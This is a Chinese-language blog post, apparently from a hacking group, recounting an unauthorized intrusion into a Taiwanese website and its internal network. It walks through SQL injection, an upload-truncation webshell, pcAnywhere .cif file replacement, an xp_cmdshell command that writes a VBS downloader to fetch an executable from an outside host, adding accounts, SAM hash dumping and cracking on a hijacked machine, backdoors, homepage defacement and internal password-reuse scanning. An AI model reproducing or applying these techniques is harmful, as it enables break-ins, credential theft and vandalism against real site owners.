管理員登錄方式進行滲透

這是前天我寫于我blog的一篇文章,是一種傳統(tǒng)的滲透方法,沒有什么新的技術,但我覺得思路有必要給大家分享一下,還有一點就是實現(xiàn)了pcanywhere的cif文件替換登錄.前幾天搞一個臺灣一個排名兩千多的站點,花費了不少時間,本以為是沒戲的了,結果今天上肉機一看,跑了一周多的hash竟然跑了出來.然后接著搞了下去.最重要的經驗就是我們要有一個思想:管理員怎么進去的,我們就怎么進去.這個站的滲透也比較慢長,花了一周多的樣子.網站很偏僻的地方存在一個注入點,是db權限的,很遺憾不是sa的， 但是不能列目錄， 還好可以猜解管理員的密碼， 在adminlogin表中得到了管理員的密碼:1qaz3edc@22$夠復雜， 登錄后臺， 不能直接上傳， 在上傳圖片的地方抓包， 然后利用截斷字符改包上傳， 得到一個asp木馬．　得到的是一個主站的webshell， 但是權限很低， 沒有修改權限， 主站服務器只開了一個80和5631， 可能文件傳輸也是通過5631傳輸?shù)模?有pcanywhere好， 原以為有戲， 可把host目錄中的cif文件下下來用破解器打開一個， 用戶名和密碼都是亂碼， 遇到過很多這種情況， 我也搞不懂原因．可能是它的用戶名用了繁體字的原因吧．　試著上傳一個知道用戶名和密碼的cif文件到host目錄下， 可還是不行， 以前沒試過， 但聽說行的， 只得試試了， 試了好久還是用我這個傳上去的cif文件的用戶名和密碼登不進．索性把它的給刪了， 把我傳上去的cif 文件名改成他的文件名， ok， pcanywhere第一次連接出錯， 再次連接， 連接成功， 但對方服務器使用的是win2003， 桌面被鎖定， 還需要 windows系統(tǒng)的用戶名和密碼才可以登錄．這里就卡起了， 怎么找到系統(tǒng)的用戶名和密碼？我利用得到的密碼變了很多方式去猜了一下， 都猜不出來系統(tǒng)的登錄密碼．　我漫無目的的在webshell里逛， 便去看了看它的數(shù)據庫連接用戶名和密碼是什么， 因為管理員很多時候密碼是一樣的．但很失望， conn.asp里面的連接是連到192.168.0.10里面的， 用戶名是xxxweb,密碼是xxxweb@10abcd123,得到個密碼也好,很顯示數(shù)據庫是連的內網中的另一臺服務器.便把這個密碼用來試了一下系統(tǒng)密碼,也不是,登不進去.    有可能數(shù)據庫服務器的sa用戶用的也是這個密碼,在webshell上用sqledit連接這個數(shù)據庫服務器的sa用戶,密碼用得到的這個密碼,連接成功,還好,有機會把這臺數(shù)據庫服務器拿下來了.執(zhí)行命令:exec master..xp_cmdshell echo Set xPost = CreateObject(^Microsoft.XMLHTTP^):xPost.Open ^GET^,^http://www.ncph.net/lcx.exe^,0:xPost.Send():Set sGet = CreateObject(^ADODB.Stream^):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^c:\c.exe^,2 >down.vbs便將down.vbs寫入到數(shù)據庫服務器里,再運行cscript down.vbs便從http://www.ncph.net/上下載了lcx.exe文件,并保存在c盤c:\c.exe.然后執(zhí)行exec master..xp_cmdshell net user ………..等等命令添加一個用戶,開啟3389,還好是2003的系統(tǒng),不用重啟,最后轉發(fā)到我的機器(因為數(shù)據庫是一個內網機器,這里知道的也只是一個內網ip所以用轉發(fā),同時也可以突破它的防火墻.)登上3389后的第一件事就是留后門,但遺憾的是我的反彈后門和端口復用后門都沒法彈回來， 看來對方裝有硬防．然后在數(shù)據庫服務器上下載http://www.ncph.net/sam.rar 抓取數(shù)據庫服務器的hash.我相信管理員數(shù)據庫服務器和管理員主站服務器是用的同一個密碼,當然這也要看運氣,我遇到的百分之八十的站是這樣的情況.然后我登上我平時常用的肉機,跑hash去了,當然用lc5跑,下載地址:http://www.ncph.net/lc5.zip 現(xiàn)在就回到文章前面所說的了,我跑hash這臺肉機不錯,用了大半年了,當初是用imail溢出得到的,上面只裝了一個imail服務,管理員很少上,所以我一直占用它的服務器,常用來跑密碼.一般hash不太復雜兩天時間就跑出來了,可這個密碼我跑了一周時間,還用了全組合,還好,今天上去一看,跑出來了.用得到的用戶名和密碼去登錄主站的系統(tǒng),先連pcanywhere,郁悶,連不上了,好像是延時,打開它的網站,很慢,以前很快的,想起了,可能是因為最近臺灣地震,損壞了大陸的光纖,最近國外很多大網站都打不開,這邊打開他的站很慢也是正常的.于是我上臺灣的vpn,現(xiàn)在網站打開很快了,連了一下pcanywhere,用以前我替換的cif文件的密碼連上去了,看來確實是大陸和臺灣的某些站點網絡出了點問題.不管那么多,先試試我得到的這個數(shù)據庫服務器密碼能不能登錄主站服務器,在pcanywhere選擇sen ctrl+alt+del打開登錄窗口,輸入密碼,登錄錯誤,郁悶,再試一下,ok,原來是反應太慢了,終于登錄成功,用管理員密碼登錄進去了.所以今天的主題我相說的是用管理員的登錄方式登錄.但總感覺太慢了,還是上國內的3389肉機跳一下吧,于是打開國內的3389,在服務器上下載了一個pcanywhere裝上,連接上去,速度很快,不錯.上服務器上去裝了個后門和一個反彈木馬,郁悶,木馬又沒有彈回來,看來被防火墻擋了.那就一直沿用管理員的登錄方式吧,改了一下首頁代碼,刷新網站,不對,郁悶.網站文件是放在d盤的,并且這個目錄開了共享,再改一下其它文件,在網站上打開顯示改了的代碼,難道首頁沒在這臺服務器上,ping了一下域名,變了,現(xiàn)在這臺是18結尾的,域名改在17服務器上去了,看來管理員可能用pcanywhere登不上這個服務器,就把首頁調用改到17那臺服務器上去了.但webshell又是這臺服務器上的,這就怪了.我用net view查看了一下,有幾個\\xxxx的.ping 了一下xxxx得到了內網ip,他應該將域名改在了17的服務器上,但又用的\\共享調用的這臺服務器上的網頁文件.我試了試那臺服務器開了5631和 3389,但5631不知道用戶名和密碼,沒登上去,用先前得到的系統(tǒng)密碼也沒能登上5631,還好開了3389,用先前的系統(tǒng)密碼登錄3389,登錄成功,上去改了一下首頁代碼,ok和我相像的一樣.下載了http://www.ncph.net/ntscan.rar ,加入先前破出來的管理員用戶名和密碼,掃了一下192.168.1.1-192.168.1.254,有十多臺服務器都用的這個密碼,ok,到這里滲透就結束了,后臺的就慢慢做了.留圖紀念:(圖示–我先從本機登錄到國內一臺肉機上219.129.x.x,再在219.129.x.x上用pcanywhere登錄到 xxx.com.tw 服務器,再在 xxx.com.tw 服務器上登錄到內網中首頁服務器192.168.1.50)